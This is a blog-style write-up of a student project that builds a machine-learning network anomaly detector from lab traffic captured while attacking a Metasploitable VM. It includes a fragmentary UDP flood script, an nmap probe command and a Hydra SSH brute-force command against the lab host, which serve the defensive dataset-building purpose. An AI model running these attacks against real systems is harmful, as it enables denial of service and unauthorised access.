Basic Machine Learning : Network Anomaly Detection
Disclaimer:- This note was written by me ( Mayank Nauni) in my personal capacity. The opinions expressed in this article are solely my own and do not reflect the view of my employer or my preference towards any of the OEMs.
Special Thanks to Kenny Ong, my friend & course-mate at Singapore University of Technology and Design for collaborating with me on this mini-project and Tao Liu for his excellent blog on the same subject https://www.linkedin.com/pulse/build-machine-learning-model-network-flow-tao-liu/
The ever-increasing rise in the number of network attacks have evolved as Internet technologies advancements and enhancements continue to improve our lives and in recent years, network intrusion detection has become a significant research issue in the industry.
The term network anomaly detection refers to the identification of the rare and unexpected bursts in activity within computer networking. Network anomaly is an intrusion attempt that is deliberate for (i) accessing information, (ii) information manipulation, or (iii) render a computer system or network unreliable or unusable.
In this project, to provide a proper setup in detecting anomaly detection, the concept of normality needs to be grasped. The traffic captured concerning normality and anomaly needs to be defined. The usage of tools to help create datasets can help us provide more findings in the areas of network intrusion detection methods and systems (NIDS).
The network topology is set up using GNS3 Emulator as a tool to simulate the network anomaly detection system. The following are the devices and virtual machines (VM).
- Switch (Gateway) Based on Cisco IOS image (12.4) – 10.0.2.1
- Kali Attacker VM – 2021.2 release – 10.0.2.15
- Metasploitable-2 VM – 10.0.2.2
- SIEM VM – 10.0.2.30
GitHub Repo: https://github.com/mayanknauni/ML_Cybersecurity
The topology has been created on GN3 network emulator which used real IOS image for Cisco Switch (12.4 version); the Kali VM (2021.2 Release) and Metasploitable VM are created on VirtualBox and VirtualBox is integrated with GNS3, the VMs are connected to the switch using a generic driver (UDP tunnel).
On the switch end, we have created a SPAN session to capture all traffic for the network port connected to the metasploitable VM and redirect it to the SIEM VM. We will use “tshark” on the SIEM VM to convert the “. pcap” files capture to “.csv” files.
Below is the GN3 topology that we have created and used for this project, the SIEM was an additional VM that was used to sniff the data during attacks to see how the attacks are being perceived by a SIEM software.
We will try to build a machine learning model for Wireshark packet-flow classification, we followed the below process to do the same:
The ML model is prepared according to the strategy below:
Our strategy is to execute four attacks, elaborated in the method section, and manually capture packets for them on the metasploitable server end, each capture is labelled accordingly, and later, all four captures are aggregated (including the benign network capture) to form a dataset.
The dataset is then sanitized using the python script which essentially vets the dataset for NaN values and replaces the empty cells with 0.
We also replaced the IP address and TCP flags value with integer values for our algorithm to run properly.
The creation of the datasets includes capturing the normal and benign communication between these clients and servers through Python scripts and all traffic collected via Wireshark as the packet capture tool.
The 4 kinds of attacks implemented and run from the malicious clients are as follows:
- Brute force
From these attacks, benign and malicious traffic is merged and labeled for classification and further analysis via Weka.
The attack was carried out at the timestamps below:
|Start Time||End Time||Exploit||Remark|
|8:05 pm||8:15 pm||Benign||Simulating usual Web Access by using the watch at 5-second interval to simulate normal web access
watch -n 5 “curl http://10.0.2.2”
|8:16 pm||8:20 pm||DDOS||ddos.py|
|9:00 pm||9:06 pm||Probe||nmap|
|9:15 pm||9:20 pm||Bruteforce||Hydra|
|9:30 pm||9:37 pm||SQL||Metasploitable|
We simulated usual Web Access by using the watch at the 5-second interval and captured the packets:
Command: watch -n 5 “curl http://10.0.2.2”
We used the below-mentioned python code to simulate DDoS attack on Metasploitable2
from DateTime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
os.system(“figlet DDos Attack”)
ip = raw_input(“IP Target : “)
port = input(“Port : “)
os.system(“figlet Attack Starting”)
sent = 0
sent = sent + 1
port = port + 1
print “Sent %s packet to %s throught port:%s”%(sent,ip,port)
if port == 65534:
port = 1
Command: python2 ddos.py
The attack started endlessly till we break the sequence.
We used the below-mentioned python code to initiate a probe on Metasploitable2
Command: nmap -sC -sV -oA project 10.0.2.2
The packets were captured during the time when the scan started and completed successfully.
We used Hydra to launch a brute-force attack on port 22 by SSH login attempts
Command: sudo hydra -V -f -t 4 -l msfadmin -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.2
|tshark -r http.pcap -T fields -E header=y -E separator=, -E quote=d -E occurrence=f -e ip.src -e ip.dst -e ip.len -e ip.flags.df -e ip.flags.mf \-e ip.fragment -e ip.fragment.count -e ip.fragments -e ip.ttl -e ip.proto -e tcp.window_size -e tcp.ack -e tcp.seq -e tcp.len -e tcp.stream -e tcp.urgent_pointer \-e tcp.flags -e tcp.analysis.ack_rtt -e tcp.segments -e tcp.reassembled.length -e http.request -e udp.port -e frame.time_relative -e frame.time_delta -e tcp.time_relative -e tcp.time_delta > benign.csv|
We are selecting below 26 features from the Wireshark capture: –
|ip.src||Source Address||IPv4 address|
|ip.dst||Destination Address||IPv4 address|
|ip.len||Total Length||Unsigned integer, 2 bytes|
|ip.fragment||IPv4 Fragment||Frame number|
|ip.fragment.count||Fragment count||Unsigned integer, 4 bytes|
|ip.fragments||IPv4 Fragments||Sequence of bytes|
|ip.ttl||Time to Live||Unsigned integer, 1 byte|
|ip.proto||Protocol||Unsigned integer, 1 byte|
|tcp.window_size||Calculated window size||Unsigned integer, 4 bytes|
|tcp.ack||Acknowledgment Number||Unsigned integer, 4 bytes|
|tcp.seq||Sequence Number||Unsigned integer, 4 bytes|
|tcp.len||TCP Segment Len||Unsigned integer, 4 bytes|
|tcp.stream||Stream index||Unsigned integer, 4 bytes|
|tcp.urgent_pointer||Urgent Pointer||Unsigned integer, 2 bytes|
|tcp.flags||Flags||Unsigned integer, 2 bytes|
|tcp.analysis.ack_rtt||The RTT to ACK the segment was||Time offset|
|tcp.segments||Reassembled TCP Segments||Label|
|tcp.reassembled.length||Reassembled TCP length||Unsigned integer, 4 bytes|
|udp.port||Source or Destination Port||Unsigned integer, 2 bytes|
|frame.time_relative||Time since reference or first frame||Time offset|
|frame.time_delta||Time delta from previous captured frame||Time offset|
|tcp.time_relative||Time since first frame in this TCP stream||Time offset|
|tcp.time_delta||Time since previous frame in this TCP stream||Time offset|
Command: python3 step1_cleanup.py benign.csv
The script below removes the row in the supplied csv file, beingn.csv in this case with 0 value, all null values are filled in with 0 and non-integer fields such as tcp.flags, ip.dst and ip.src are converted into integers.
import pandas as pd
from functools import reduce
filename = sys.argv
file1 = pd.read_csv(filename)
# step-1 to replace all null
update_file = file1.fillna(” “)
update_file.to_csv(‘updated_’+filename, index = False)
# step-2 to remove all rows with null value
update_file = file1.fillna(0)
# step-3 to convert tcp.flag, ip.dst, ip.src to integer
update_file[‘tcp.flags’] = update_file[‘tcp.flags’].apply(lambda x: int(str(x), 16))
update_file[‘ip.dst’] = update_file[‘ip.dst’].apply(lambda x: int(ipaddress.IPv4Address(x)))
update_file[‘ip.src’] = update_file[‘ip.src’].apply(lambda x: int(ipaddress.IPv4Address(x)))
update_file.to_csv(‘updated_’+filename, index = False)
The command above generated a new file with cleaned up data as “updated_beingn.csv”.
We use another python script to add another column in the file “updated_benign.csv” with the name “label” and specify the label with the command below: –
Command: python2 step2_labelling.py benign updated_benign.csv
label = sys.argv
file_name = sys.argv
file = open(file_name)
content = csv.reader(file)
row0 = content.next()
all = 
for item in content:
new_file = open(label+’_’+ file_name, ‘w’)
writer = csv.writer(new_file, lineterminator=’\n’)
It creates a new file with name benign_updated_benign.csv, where the benign highlighted in yellow is the label, we have passed with the python script.
This step is repeated for all four attacks and four additional csv files are obtained: –
We will aggregate the above five files into our common dataset called “master_dataset.csv”. We will use this dataset further to analyze Weka.
We analyzed the “master_dataset.csv” in Weka software, we opened this csv in Weka, a glimpse of label attribute is below: –
We ran RelieFAttributeEval which yielded the below results:
The top 15 attributes out of 26 are ranked below:
Correctly Classified Instances 16204 98.4088 %
Incorrectly Classified Instances 262 1.5912 %
Correctly Classified Instances 16148 98.0687 %
Incorrectly Classified Instances 318 1.9313 %
Correctly Classified Instances 15815 96.0464 %
Incorrectly Classified Instances 651 3.9536 %
Correctly Classified Instances 15216 92.4086 %
Incorrectly Classified Instances 1250 7.5914 %
Based on the outputs above, J48 decision tree model gave us best accuracy so we will proceed to build a detection tool around the same.
We used the below for building our offline detection tool: –
- Python: 3.8.5 (default, Jan 27 2021, 15:41:15)
- [GCC 9.3.0]
- scipy: 1.6.0
- numpy: 1.19.5
- matplotlib: 3.4.3
- pandas: 1.3.1
- sklearn: 0.24.2
We’ve split our data into 3 datasets, one for training, another for validation, and the last one for testing. After running this program for the default dataset “master_dataset.csv”, we get the output below: –
We used the models below for comparison on accuracy: –
- ‘LR’ : Logistic Regression
- ‘LDA’: Linear Discriminant Analysis
- ‘KNN’: KNeighbors Classifier
- ‘CART’: Decision Tree Classifier
Command: python3 step3_train.py
We are using CART or Decision Tree, which is a white box type of ML algorithm. The time complexity of decision trees is a function of the number of records and number of attributes in the given data. Decision trees can handle high-dimensional data with good accuracy.
As seen from the output below CART was reported to have maximum accuracy for the first comparison i.e. 98.21% which is very close to what we observed in Weka i.e. 98.40% accuracy.
The accuracy of the final testing dataset was 98.31%.
We have saved our model using the library joblib as “finalized_DT_model.sav”
We initiated a fresh probe, and captured the data, converted to csv, labelled as “unknown” and appended it to master-dataset.csv, we ran the same model again and checked the confusion matrix, as seen below, the confusion matrix shows all counts of the probe into the fourth column which is probe itself.
We ran the amended master-dataset.csv on Weka J48 model as well to confirm our results and as expected, it gave us similar results in the confusion matrix, it confirms that the prediction works as expected:
We were able to successfully produce a working detection model using a decision tree algorithm with an accuracy of 98.4%. The results of the tool coincided with the results produced by Weka proving that the tool we’ve created and the model we’ve deployed produces legitimate results.
We had tried “CICFlowmeter” to perform feature extraction, while it took us days to just get it running as the majority of dependencies required by it are very old, even after getting it up and running gave erroneous outputs for the same data when subjected to multiple iterations, for example for a flow length of 2200 packets it could only generate 101 packets with output, which made us switch to t-shark instead.
We tried different ways for attacking the metasploitable VM but given the limited resources of our laptop, the VMs would crash frequently hence we had to select the not-so-resource-intensive attack methodologies.
We have concluded that while our model’s accuracy rate is very high i.e. 98.4% accuracy, it is because the dataset we have used is small and hence resulted in some biasness, if we had to do it for a production environment with more infra resources available, we would have run the captures for days.
We have provided below files as part of the submission.
|1||step1_cleanup.py||For csv cleanup
python3 step1_cleanup.py filename.csv
|2||step2_labelling.py||For labelling the csv
python2 step2_labelling.py benign updated_benign.csv
|3||step3_train.py||For training and prediction (refers to static file master_dataset.csv)
|Raw Attack Wireshark Captures|
|Individual attack CSV files|
|7||finalized_DT_model.sav||Saved ML Model|
|8||ddos.py||For DDoS simulation